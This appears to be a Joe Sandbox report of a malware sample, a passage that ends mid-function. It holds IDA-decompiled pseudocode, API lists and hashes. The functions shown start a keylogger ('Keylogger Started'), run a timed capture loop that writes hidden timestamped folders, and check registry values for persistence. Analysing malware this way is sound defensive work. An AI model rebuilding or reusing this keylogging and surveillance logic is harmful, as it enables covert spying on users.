                                                                                                                                      0x013076d6
                                                                                                                                      0x013076d9
                                                                                                                                      0x013076df
                                                                                                                                      0x013076e2
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013076f4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013076fe
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01307708
                                                                                                                                      0x0130770d
                                                                                                                                      0x0130770f
                                                                                                                                      0x0130776f
                                                                                                                                      0x01307777
                                                                                                                                      0x0130777e
                                                                                                                                      0x01307782
                                                                                                                                      0x01307789
                                                                                                                                      0x01307792
                                                                                                                                      0x01307794
                                                                                                                                      0x01307798
                                                                                                                                      0x0130779b
                                                                                                                                      0x013077a2
                                                                                                                                      0x013077a5
                                                                                                                                      0x013077aa
                                                                                                                                      0x013077ad
                                                                                                                                      0x013077b2
                                                                                                                                      0x013077b5
                                                                                                                                      0x013077ba
                                                                                                                                      0x013076e7
                                                                                                                                      0x013076e7
                                                                                                                                      0x00000000
                                                                                                                                      0x01307711
                                                                                                                                      0x01307716
                                                                                                                                      0x0130771e
                                                                                                                                      0x01307725
                                                                                                                                      0x01307729
                                                                                                                                      0x01307730
                                                                                                                                      0x01307739
                                                                                                                                      0x0130773b
                                                                                                                                      0x0130773f
                                                                                                                                      0x01307742
                                                                                                                                      0x01307749
                                                                                                                                      0x0130774c
                                                                                                                                      0x01307751
                                                                                                                                      0x01307754
                                                                                                                                      0x01307759
                                                                                                                                      0x0130775c
                                                                                                                                      0x01307761
                                                                                                                                      0x01307765
                                                                                                                                      0x013076ea
                                                                                                                                      0x013076ea
                                                                                                                                      0x00000000
                                                                                                                                      0x013076ea
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013077c3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013077ca
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013077d1
                                                                                                                                      0x013077d6
                                                                                                                                      0x013077d6
                                                                                                                                      0x013077e0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013076c5
                                                                                                                                      0x013077e5
                                                                                                                                      0x013077fa
                                                                                                                                      0x0130780b
                                                                                                                                      0x0130781a
                                                                                                                                      0x0130781e
                                                                                                                                      0x0130782c
                                                                                                                                      0x01307834
                                                                                                                                      0x0130783c
                                                                                                                                      0x0130784c
                                                                                                                                      0x0130784f
                                                                                                                                      0x01307853
                                                                                                                                      0x0130785c
                                                                                                                                      0x01307864
                                                                                                                                      0x0130786c
                                                                                                                                      0x01307877
                                                                                                                                      0x0130787f
                                                                                                                                      0x0130788c
                                                                                                                                      0x01307895
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01307697
                                                                                                                                      • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 013077FA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prologLongNamePath
                                                                                                                                      • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                      • API String ID: 2773438305-1609423294
                                                                                                                                      • Opcode ID: c821245f10639e97832efb930e9fd5301a2fa0ed54c4d8a592953ef6ca6ef3dc
                                                                                                                                      • Instruction ID: 5a205599d999f5e309e6f6e49d02fa447c75331ba3cded3dea2708b56fb26ee7
                                                                                                                                      • Opcode Fuzzy Hash: c821245f10639e97832efb930e9fd5301a2fa0ed54c4d8a592953ef6ca6ef3dc
                                                                                                                                      • Instruction Fuzzy Hash: D0518231800169DECB16F7A8CCA5AEEB7F4BF2461CF544159D442A36D1EF702E4ACB61
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                      			E01306B41() {
                                                                                                                                      				void* _t54;
                                                                                                                                      				void* _t55;
                                                                                                                                      				void* _t71;
                                                                                                                                      				long _t81;
                                                                                                                                      				void* _t82;
                                                                                                                                      				long _t84;
                                                                                                                                      				void* _t93;
                                                                                                                                      				void* _t95;
                                                                                                                                      				void* _t102;
                                                                                                                                      				void* _t137;
                                                                                                                                      				void* _t143;
                                                                                                                                      				void* _t144;
                                                                                                                                      				char* _t146;
                                                                                                                                      				void* _t147;
                                                                                                                                      				intOrPtr _t148;
                                                                                                                                      				void* _t149;
                                                                                                                                      				void* _t150;
                                                                                                                                      
                                                                                                                                      				E01323174(E01323745, _t137, _t150);
                                                                                                                                      				_push(_t143);
                                                                                                                                      				 *((intOrPtr*)(_t147 - 0x10)) = _t148;
                                                                                                                                      				 *(_t147 - 4) =  *(_t147 - 4) & 0x00000000;
                                                                                                                                      				_t151 =  *0x132f7cc;
                                                                                                                                      				if( *0x132f7cc == 0) {
                                                                                                                                      					E013063AC(_t137, _t143); // executed
                                                                                                                                      				}
                                                                                                                                      				_t146 =  *((intOrPtr*)(_t147 + 8));
                                                                                                                                      				_t54 = E01302712(_t146 + 4, _t151);
                                                                                                                                      				_t138 =  *((intOrPtr*)(_t146 + 2));
                                                                                                                                      				_push(_t54); // executed
                                                                                                                                      				_t55 = E01307692(_t147 - 0x6c,  *((intOrPtr*)(_t146 + 2)), _t151); // executed
                                                                                                                                      				E0130275A(0x132fabc,  *((intOrPtr*)(_t146 + 2)), _t55);
                                                                                                                                      				E01302755(_t147 - 0x6c, _t138, _t151);
                                                                                                                                      				E01302801(_t147 - 0x3c);
                                                                                                                                      				E01302801(_t147 - 0xe4);
                                                                                                                                      				E01302801(_t147 - 0x54);
                                                                                                                                      				_t102 = 0;
                                                                                                                                      				 *(_t147 - 4) = 3;
                                                                                                                                      				if( *_t146 == 0) {
                                                                                                                                      					E01302723(_t147 - 0x3c, L"time_%04i.%02i.%02i_%02i.%02i.%02i");
                                                                                                                                      				}
                                                                                                                                      				_t144 = Sleep;
                                                                                                                                      				L5:
                                                                                                                                      				while(1) {
                                                                                                                                      					if( *_t146 != 1) {
                                                                                                                                      						L10:
                                                                                                                                      						GetLocalTime(_t147 - 0x20);
                                                                                                                                      						_push( *(_t147 - 0x14) & 0x0000ffff);
                                                                                                                                      						_push( *(_t147 - 0x16) & 0x0000ffff);
                                                                                                                                      						_push( *(_t147 - 0x18) & 0x0000ffff);
                                                                                                                                      						_push( *(_t147 - 0x1a) & 0x0000ffff);
                                                                                                                                      						_push( *(_t147 - 0x1e) & 0x0000ffff);
                                                                                                                                      						E0130428B(_t147 - 0x4f8, E01302712(_t147 - 0x3c, __eflags),  *(_t147 - 0x20) & 0x0000ffff);
                                                                                                                                      						_push(0x1329c08);
                                                                                                                                      						_t71 = E013031D6(_t147 - 0xcc, 0x132fabc, __eflags);
                                                                                                                                      						_t148 = _t148 + 0x24;
                                                                                                                                      						 *(_t147 - 4) = 5;
                                                                                                                                      						_t141 = E013031AE(_t147 - 0xb4, _t71, _t144, _t147 - 0x4f8);
                                                                                                                                      						 *(_t147 - 4) = 6;
                                                                                                                                      						E0130275A(_t147 - 0x54, _t72, E013031AE(_t147 - 0x9c, _t72, _t144, "."));
                                                                                                                                      						E01302755(_t147 - 0x9c, _t141, __eflags);
                                                                                                                                      						E01302755(_t147 - 0xb4, _t141, __eflags);
                                                                                                                                      						 *(_t147 - 4) = 3;
                                                                                                                                      						E01302755(_t147 - 0xcc, _t141, __eflags);
                                                                                                                                      						CreateDirectoryW(E01302712(0x132fabc, __eflags), 0);
                                                                                                                                      						__eflags =  *((char*)(_t146 + 0x40));
                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                      							SetFileAttributesW(E01302712(0x132fabc, __eflags), 2);
                                                                                                                                      						}
                                                                                                                                      						_t81 =  *(_t146 + 0x3c);
                                                                                                                                      						__eflags = _t81;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							_t82 = E01302712(_t147 - 0x54, __eflags);
                                                                                                                                      							_t141 =  *((intOrPtr*)(_t146 + 1));
                                                                                                                                      							E01306984(_t82,  *((intOrPtr*)(_t146 + 1)), _t144, __eflags);
                                                                                                                                      						} else {
                                                                                                                                      							__eflags = _t81 - 1;
                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                      								_t95 = E01302712(_t147 - 0x54, __eflags);
                                                                                                                                      								_t141 =  *((intOrPtr*)(_t146 + 1));
                                                                                                                                      								E01306A43(_t95,  *((intOrPtr*)(_t146 + 1)), __eflags);
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						__eflags =  *_t146;
                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                      							_t102 = 0;
                                                                                                                                      							_t84 =  *(_t146 + 0x38) * 0x3e8;
                                                                                                                                      							__eflags = _t84;
                                                                                                                                      						} else {
                                                                                                                                      							_t84 =  *(_t146 + 0x34) * 0xea60;
                                                                                                                                      						}
                                                                                                                                      						Sleep(_t84);
                                                                                                                                      						continue;
                                                                                                                                      					} else {
                                                                                                                                      						goto L6;
                                                                                                                                      					}
                                                                                                                                      					while(1) {
                                                                                                                                      						L6:
                                                                                                                                      						_t154 = _t102;
                                                                                                                                      						if(_t102 != 0) {
                                                                                                                                      							break;
                                                                                                                                      						}
                                                                                                                                      						_t149 = _t148 - 0x18;
                                                                                                                                      						E01302814(_t149, _t141, _t154, _t146 + 0x1c);
                                                                                                                                      						_t141 = _t147 - 0x2f0;
                                                                                                                                      						_t93 = E01307932(0, _t147 - 0x2f0, _t154); // executed
                                                                                                                                      						_t102 = _t93;
                                                                                                                                      						_t148 = _t149 + 0x18;
                                                                                                                                      						if(_t102 != 0) {
                                                                                                                                      							break;
                                                                                                                                      						}
                                                                                                                                      						Sleep(0x3e8); // executed
                                                                                                                                      					}
                                                                                                                                      					_t142 = E013027E1(_t147 - 0x84, _t141, _t147 - 0x2f0);
                                                                                                                                      					 *(_t147 - 4) = 4;
                                                                                                                                      					E0130275A(_t147 - 0x3c, _t86, E013031AE(_t147 - 0x6c, _t86, _t144, L"_%04i.%02i.%02i_%02i.%02i.%02i"));
                                                                                                                                      					E01302755(_t147 - 0x6c, _t142, __eflags);
                                                                                                                                      					 *(_t147 - 4) = 3;
                                                                                                                                      					E01302755(_t147 - 0x84, _t142, __eflags);
                                                                                                                                      					goto L10;
                                                                                                                                      				}
                                                                                                                                      			}




















                                                                                                                                      0x01306b46
                                                                                                                                      0x01306b53
                                                                                                                                      0x01306b54
                                                                                                                                      0x01306b57
                                                                                                                                      0x01306b5b
                                                                                                                                      0x01306b62
                                                                                                                                      0x01306b64
                                                                                                                                      0x01306b64
                                                                                                                                      0x01306b69
                                                                                                                                      0x01306b6f
                                                                                                                                      0x01306b74
                                                                                                                                      0x01306b7a
                                                                                                                                      0x01306b7b
                                                                                                                                      0x01306b87
                                                                                                                                      0x01306b8f
                                                                                                                                      0x01306b97
                                                                                                                                      0x01306ba2
                                                                                                                                      0x01306baa
                                                                                                                                      0x01306baf
                                                                                                                                      0x01306bb1
                                                                                                                                      0x01306bb7
                                                                                                                                      0x01306bc1
                                                                                                                                      0x01306bc1
                                                                                                                                      0x01306bc6
                                                                                                                                      0x00000000
                                                                                                                                      0x01306bcc
                                                                                                                                      0x01306bcf
                                                                                                                                      0x01306c48
                                                                                                                                      0x01306c4c
                                                                                                                                      0x01306c59
                                                                                                                                      0x01306c5e
                                                                                                                                      0x01306c63
                                                                                                                                      0x01306c68
                                                                                                                                      0x01306c6d
                                                                                                                                      0x01306c80
                                                                                                                                      0x01306c85
                                                                                                                                      0x01306c95
                                                                                                                                      0x01306c9a
                                                                                                                                      0x01306ca3
                                                                                                                                      0x01306cbb
                                                                                                                                      0x01306cbd
                                                                                                                                      0x01306cd1
                                                                                                                                      0x01306cdc
                                                                                                                                      0x01306ce7
                                                                                                                                      0x01306cf2
                                                                                                                                      0x01306cf6
                                                                                                                                      0x01306d08
                                                                                                                                      0x01306d0e
                                                                                                                                      0x01306d12
                                                                                                                                      0x01306d21
                                                                                                                                      0x01306d21
                                                                                                                                      0x01306d2a
                                                                                                                                      0x01306d2a
                                                                                                                                      0x01306d2d
                                                                                                                                      0x01306d4b
                                                                                                                                      0x01306d50
                                                                                                                                      0x01306d55
                                                                                                                                      0x01306d2f
                                                                                                                                      0x01306d2f
                                                                                                                                      0x01306d32
                                                                                                                                      0x01306d37
                                                                                                                                      0x01306d3c
                                                                                                                                      0x01306d41
                                                                                                                                      0x01306d41
                                                                                                                                      0x01306d32
                                                                                                                                      0x01306d5a
                                                                                                                                      0x01306d5d
                                                                                                                                      0x01306d68
                                                                                                                                      0x01306d6a
                                                                                                                                      0x01306d6a
                                                                                                                                      0x01306d5f
                                                                                                                                      0x01306d5f
                                                                                                                                      0x01306d5f
                                                                                                                                      0x01306d72
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01306bd1
                                                                                                                                      0x01306bd1
                                                                                                                                      0x01306bd1
                                                                                                                                      0x01306bd3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01306bd5
                                                                                                                                      0x01306bde
                                                                                                                                      0x01306be3
                                                                                                                                      0x01306beb
                                                                                                                                      0x01306bf0
                                                                                                                                      0x01306bf2
                                                                                                                                      0x01306bf7
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01306bfe
                                                                                                                                      0x01306bfe
                                                                                                                                      0x01306c19
                                                                                                                                      0x01306c1b
                                                                                                                                      0x01306c2c
                                                                                                                                      0x01306c34
                                                                                                                                      0x01306c3f
                                                                                                                                      0x01306c43
                                                                                                                                      0x00000000
                                                                                                                                      0x01306c43

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01306B46
                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 01306BFE
                                                                                                                                      • GetLocalTime.KERNEL32(?,00000000), ref: 01306C4C
                                                                                                                                        • Part of subcall function 013063AC: GdiplusStartup.GDIPLUS(0132F7CC,?,00000000,?,?,?,?,?,01306B69), ref: 013063D4
                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 01306D08
                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000002), ref: 01306D21
                                                                                                                                      • Sleep.KERNEL32(?), ref: 01306D72
                                                                                                                                      Strings
                                                                                                                                      • _%04i.%02i.%02i_%02i.%02i.%02i, xrefs: 01306C14
                                                                                                                                      • time_%04i.%02i.%02i_%02i.%02i.%02i, xrefs: 01306BB9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep$AttributesCreateDirectoryFileGdiplusH_prologLocalStartupTime
                                                                                                                                      • String ID: _%04i.%02i.%02i_%02i.%02i.%02i$time_%04i.%02i.%02i_%02i.%02i.%02i
                                                                                                                                      • API String ID: 2314459675-835054925
                                                                                                                                      • Opcode ID: 98e9b515cb012c806ecbbe0bace81aa8ac7e39e9821198db4cd84c583c64f43d
                                                                                                                                      • Instruction ID: c3794a229d0442c8e7100d8c86eb27a4b65c9f2f2a56eef706fa72a1755c853b
                                                                                                                                      • Opcode Fuzzy Hash: 98e9b515cb012c806ecbbe0bace81aa8ac7e39e9821198db4cd84c583c64f43d
                                                                                                                                      • Instruction Fuzzy Hash: 9B51877190021A9EDB26FBA8C979BEEBBF8AF24708F50405DD446531C5EF746A48CB20
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                      			E013052DD() {
                                                                                                                                      				void* _t22;
                                                                                                                                      				void* _t31;
                                                                                                                                      				void* _t62;
                                                                                                                                      				void* _t72;
                                                                                                                                      				void* _t73;
                                                                                                                                      				void* _t74;
                                                                                                                                      				void* _t76;
                                                                                                                                      				void* _t81;
                                                                                                                                      
                                                                                                                                      				E01323174(E013235BF, _t62, _t81);
                                                                                                                                      				_t82 = 1;
                                                                                                                                      				while(1) {
                                                                                                                                      					 *(_t72 - 0x10) =  *(_t72 - 0x10) & 0x00000000;
                                                                                                                                      					_t63 = E01302712(0x132f948, _t82); // executed
                                                                                                                                      					E013060ED(_t19, _t44, _t72 - 0x10); // executed
                                                                                                                                      					_pop(_t44);
                                                                                                                                      					_t22 =  *(_t72 - 0x10) - 1;
                                                                                                                                      					if(_t22 == 0) {
                                                                                                                                      						goto L5;
                                                                                                                                      					}
                                                                                                                                      					_t31 = _t22 - 1;
                                                                                                                                      					if(_t31 == 0) {
                                                                                                                                      						_push(1);
                                                                                                                                      						_t77 = _t73 - 0x18;
                                                                                                                                      						E01302814(_t73 - 0x18, _t63, __eflags, 0x132f900);
                                                                                                                                      						_push(L"path");
                                                                                                                                      						E01306201(0x80000001, E01302712(0x132f948, __eflags));
                                                                                                                                      						E01302917(_t72 - 0x44, _t33, "4.0.0");
                                                                                                                                      						_push(1);
                                                                                                                                      						 *(_t72 - 4) = 1;
                                                                                                                                      						E0130757A(_t77 + 0x20 - 0x18, _t72 - 0x44, __eflags);
                                                                                                                                      						_push("v");
                                                                                                                                      						E01306201(0x80000001, E01302712(0x132f948, __eflags));
                                                                                                                                      						E013028AF(_t72 - 0x44, _t37, __eflags);
                                                                                                                                      						ExitProcess(0);
                                                                                                                                      					}
                                                                                                                                      					_t85 = _t31 != 1;
                                                                                                                                      					if(_t31 != 1) {
                                                                                                                                      						L6:
                                                                                                                                      						Sleep(0xbb8); // executed
                                                                                                                                      						continue;
                                                                                                                                      					}
                                                                                                                                      					E0130541E();
                                                                                                                                      					L5:
                                                                                                                                      					_push(1);
                                                                                                                                      					_t74 = _t73 - 0x18;
                                                                                                                                      					E01302814(_t74, _t63, _t85, 0x132f900);
                                                                                                                                      					_push(L"path");
                                                                                                                                      					E01306201(0x80000001, E01302712(0x132f948, _t85));
                                                                                                                                      					E01302917(_t72 - 0x2c, _t24, "4.0.0");
                                                                                                                                      					 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
                                                                                                                                      					_push(1);
                                                                                                                                      					_t76 = _t74 + 0x20 - 0x18;
                                                                                                                                      					E0130757A(_t76, _t72 - 0x2c, _t85);
                                                                                                                                      					_push("v");
                                                                                                                                      					E01306201(0x80000001, E01302712(0x132f948, _t85));
                                                                                                                                      					_t9 = _t72 - 4;
                                                                                                                                      					 *_t9 =  *(_t72 - 4) | 0xffffffff;
                                                                                                                                      					_t82 =  *_t9;
                                                                                                                                      					_t44 = _t72 - 0x2c;
                                                                                                                                      					_t73 = _t76 + 0x20;
                                                                                                                                      					E013028AF(_t72 - 0x2c, _t28,  *_t9);
                                                                                                                                      					goto L6;
                                                                                                                                      				}
                                                                                                                                      			}











                                                                                                                                      0x013052e2
                                                                                                                                      0x013052f3
                                                                                                                                      0x013052f4
                                                                                                                                      0x013052f4
                                                                                                                                      0x01305304
                                                                                                                                      0x01305306
                                                                                                                                      0x0130530f
                                                                                                                                      0x01305310
                                                                                                                                      0x01305313
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01305315
                                                                                                                                      0x01305318
                                                                                                                                      0x013053a9
                                                                                                                                      0x013053aa
                                                                                                                                      0x013053b4
                                                                                                                                      0x013053b9
                                                                                                                                      0x013053cc
                                                                                                                                      0x013053dc
                                                                                                                                      0x013053e1
                                                                                                                                      0x013053e5
                                                                                                                                      0x013053ed
                                                                                                                                      0x013053f2
                                                                                                                                      0x01305405
                                                                                                                                      0x01305410
                                                                                                                                      0x01305417
                                                                                                                                      0x01305417
                                                                                                                                      0x0130531e
                                                                                                                                      0x01305321
                                                                                                                                      0x01305399
                                                                                                                                      0x0130539e
                                                                                                                                      0x00000000
                                                                                                                                      0x0130539e
                                                                                                                                      0x01305323
                                                                                                                                      0x01305328
                                                                                                                                      0x01305328
                                                                                                                                      0x01305329
                                                                                                                                      0x01305333
                                                                                                                                      0x01305338
                                                                                                                                      0x0130534b
                                                                                                                                      0x0130535b
                                                                                                                                      0x01305360
                                                                                                                                      0x01305367
                                                                                                                                      0x01305368
                                                                                                                                      0x0130536d
                                                                                                                                      0x01305372
                                                                                                                                      0x01305385
                                                                                                                                      0x0130538a
                                                                                                                                      0x0130538a
                                                                                                                                      0x0130538a
                                                                                                                                      0x0130538e
                                                                                                                                      0x01305391
                                                                                                                                      0x01305394
                                                                                                                                      0x00000000
                                                                                                                                      0x01305394

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 013052E2
                                                                                                                                        • Part of subcall function 013060ED: RegOpenKeyExW.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000), ref: 0130610D
                                                                                                                                        • Part of subcall function 013060ED: RegQueryValueExW.KERNELBASE(?,override,00000000,0132F948,0132F948,?,0132F948), ref: 0130612D
                                                                                                                                        • Part of subcall function 013060ED: RegCloseKey.KERNELBASE(?), ref: 01306138
                                                                                                                                      • Sleep.KERNELBASE(00000BB8), ref: 0130539E
                                                                                                                                      • ExitProcess.KERNEL32 ref: 01305417
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseExitH_prologOpenProcessQuerySleepValue
                                                                                                                                      • String ID: 4.0.0$path
                                                                                                                                      • API String ID: 95523736-3368409283
                                                                                                                                      • Opcode ID: dc9450742b58fec44511483677625f0f75e3e61ea147a3a241c86e573b23ec2c
                                                                                                                                      • Instruction ID: 927725b2d7400cd8871ed08ef22dba260cf0c69520026e46f26c9236bb0a12dd
                                                                                                                                      • Opcode Fuzzy Hash: dc9450742b58fec44511483677625f0f75e3e61ea147a3a241c86e573b23ec2c
                                                                                                                                      • Instruction Fuzzy Hash: 9F21F670F402265BDB0AF7FC887ABEE7AE96F7460CF50400CE415672C6EF651A1087A2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                      			E013013D7(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* _t15;
                                                                                                                                      				void* _t20;
                                                                                                                                      				void* _t31;
                                                                                                                                      				void* _t33;
                                                                                                                                      				void* _t35;
                                                                                                                                      
                                                                                                                                      				_t38 = __eflags;
                                                                                                                                      				_t26 = __edx;
                                                                                                                                      				_t20 = __ecx;
                                                                                                                                      				E01323174(E013231BE, __edx, __eflags);
                                                                                                                                      				_push(_t20);
                                                                                                                                      				_t31 = _t20;
                                                                                                                                      				 *((intOrPtr*)(_t33 - 4)) = 0;
                                                                                                                                      				 *((char*)(_t31 + 0x50)) = 1;
                                                                                                                                      				E01302728(_t31 + 0x68, _t33 + 8);
                                                                                                                                      				E013027E1(_t35 - 0x18, _t26, L"Keylogger Started");
                                                                                                                                      				E01301DA8(_t31, _t26, _t38);
                                                                                                                                      				CreateThread(0, 0, E013014BC, _t31, 0, 0); // executed
                                                                                                                                      				_t39 =  *_t31;
                                                                                                                                      				if( *_t31 == 0) {
                                                                                                                                      					CreateThread(0, 0, E013014A6, _t31, 0, 0); // executed
                                                                                                                                      				}
                                                                                                                                      				CreateThread(0, 0, E013014C8, _t31, 0, 0); // executed
                                                                                                                                      				_t15 = E01302755(_t33 + 8, _t26, _t39);
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t33 - 0xc));
                                                                                                                                      				return _t15;
                                                                                                                                      			}








                                                                                                                                      0x013013d7
                                                                                                                                      0x013013d7
                                                                                                                                      0x013013d7
                                                                                                                                      0x013013dc
                                                                                                                                      0x013013e1
                                                                                                                                      0x013013e5
                                                                                                                                      0x013013ec
                                                                                                                                      0x013013f3
                                                                                                                                      0x013013f7
                                                                                                                                      0x01301406
                                                                                                                                      0x0130140d
                                                                                                                                      0x01301422
                                                                                                                                      0x01301424
                                                                                                                                      0x01301426
                                                                                                                                      0x01301432
                                                                                                                                      0x01301432
                                                                                                                                      0x0130143e
                                                                                                                                      0x01301443
                                                                                                                                      0x0130144d
                                                                                                                                      0x01301456

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 013013DC
                                                                                                                                        • Part of subcall function 01301DA8: __EH_prolog.LIBCMT ref: 01301DAD
                                                                                                                                        • Part of subcall function 01301DA8: GetLocalTime.KERNEL32(?,?,00000000), ref: 01301DC1
                                                                                                                                        • Part of subcall function 01301DA8: wsprintfW.USER32 ref: 01301E4B
                                                                                                                                      • CreateThread.KERNELBASE ref: 01301422
                                                                                                                                      • CreateThread.KERNELBASE ref: 01301432
                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000014C8,?,00000000,00000000), ref: 0130143E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread$H_prolog$LocalTimewsprintf
                                                                                                                                      • String ID: Keylogger Started
                                                                                                                                      • API String ID: 2758404132-1311849563
                                                                                                                                      • Opcode ID: 5c2afce4fe072f2d4c6b5809da4e56e1487ba130e5654b857437e6916a2ce2db
                                                                                                                                      • Instruction ID: f2740d07e0010409a809c087681d391a692de74aea17e07a837a603182e6d2c4
                                                                                                                                      • Opcode Fuzzy Hash: 5c2afce4fe072f2d4c6b5809da4e56e1487ba130e5654b857437e6916a2ce2db
                                                                                                                                      • Instruction Fuzzy Hash: 1A01A2B16002287ED722BB6A8CD5DAB7AECEF5569CB41451DF00662181DB749D04C7B0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                      			E01307932(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                      				void* __ebx;
                                                                                                                                      				struct HWND__* _t33;
                                                                                                                                      				void* _t61;
                                                                                                                                      				intOrPtr _t63;
                                                                                                                                      				intOrPtr _t65;
                                                                                                                                      				intOrPtr _t90;
                                                                                                                                      				struct HWND__* _t92;
                                                                                                                                      				signed short _t94;
                                                                                                                                      				int _t97;
                                                                                                                                      				int _t99;
                                                                                                                                      				signed int _t100;
                                                                                                                                      				void* _t101;
                                                                                                                                      				void* _t103;
                                                                                                                                      				void* _t104;
                                                                                                                                      
                                                                                                                                      				_t90 = __edx;
                                                                                                                                      				_t65 = __ecx;
                                                                                                                                      				E01323174(E01323877, __edx, __eflags);
                                                                                                                                      				_t104 = _t103 - 0x38;
                                                                                                                                      				 *((intOrPtr*)(_t101 - 0x18)) = _t90;
                                                                                                                                      				_t63 = _t65;
                                                                                                                                      				 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                                                                                                                                      				_t33 = GetForegroundWindow(); // executed
